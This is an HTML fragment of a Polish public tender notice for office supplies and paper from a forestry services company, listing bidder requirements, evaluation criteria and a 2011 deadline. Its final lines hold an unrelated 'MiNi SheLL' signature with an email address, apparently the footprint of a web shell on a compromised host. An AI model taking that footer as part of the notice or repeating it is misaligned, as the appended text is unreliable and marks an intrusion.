4.	  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia; 
	oraz:
5.         w ciągu ostatnich 3 lat zrealizowali co najmniej 2 zamówienia polegające na dostawie     
      materiałów biurowych i papieru odpowiadającej wartości zamówienia. 

        Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu określonych  w pkt 6.1 siwz wg formuły  spełnia - nie spełnia oraz na podstawie załączonych dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu określonych  w pkt 6.1 siwz wg formuły  spełnia - nie spełnia oraz na podstawie załączonych dokumentów i oświadczeń.
w ciągu ostatnich 3 lat zrealizowali co najmniej 2 zamówienia polegające na dostawie     
      materiałów biurowych i papieru odpowiadającej wartości zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin dostawy - 5</li>
<li>3 - gwarancja - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wroclaw.lasv.gov.pl/zul_w_bystrzycy_klo<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Usług Leśnych w Bystrzycy Kłodzkiej
ul. Nadbrzeżna 11
kod: 57-500 Bystrzyca.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2011 godzina 10:00, miejsce: Zakład Usług Leśnych w Bystrzycy Kłodzkiej
ul. Nadbrzeżna 11
kod: 57-500 Bystrzyca.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com